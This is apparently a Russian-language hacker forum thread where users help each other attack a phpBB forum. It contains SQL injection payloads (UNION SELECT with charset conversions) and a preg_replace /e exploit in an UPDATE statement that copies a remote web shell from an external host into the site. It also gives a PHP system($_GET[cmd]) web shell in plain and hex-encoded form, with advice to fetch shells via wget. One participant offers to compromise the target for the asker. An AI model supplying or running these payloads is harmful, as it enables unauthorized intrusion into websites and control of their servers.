Здесь проблема в кодировке, или в отстутсвии оператора UNION?

В кодировке. Пробуй convert(concat(version())+using+latin1)

union+select+1,unhex(hex(version())),3/*

convert(version(),binary)
AES_DECRYPT(AES_ENCRYPT(CONCAT(version()),0x71),0x 71)
...
Давай все поперечисляем?

Действительно, в кодировке.
Спасибо

хм... вот такая вот ошибочка когда пытаюсь залить код с copy:
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx/httpdocs/f' at line 1

UPDATE forum_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='forum:copy('http://shall57.narod.ru/shall.txt','/usr/local/www/vhosts/xxx.ru/httpdocs/forum/avatars/shall.txt')' WHERE user_id=2

Line : 980
File : admin_db_utilities.php


Подумал можт дело в '' убрал их... залилось но выдает пустую страничку (((((

а что system(wget get и т.д) уже не в моде? или отключён? Лишний гемор всё это...

+1
Всё равно спросят )
'<?system($_GET[cmd]);?>'
Или так, если кавычки не катят.
0x3c3f2073797374656d2824636d64293b203f3e
Потом обращаешься к нему
shell.php?cmd=ls -la
wget'oм заливаешь шелл со своего хоста.

Ghost0ff
в пхпбб какой версии пытаешся залить шелл? кинь данные в пм зделаю)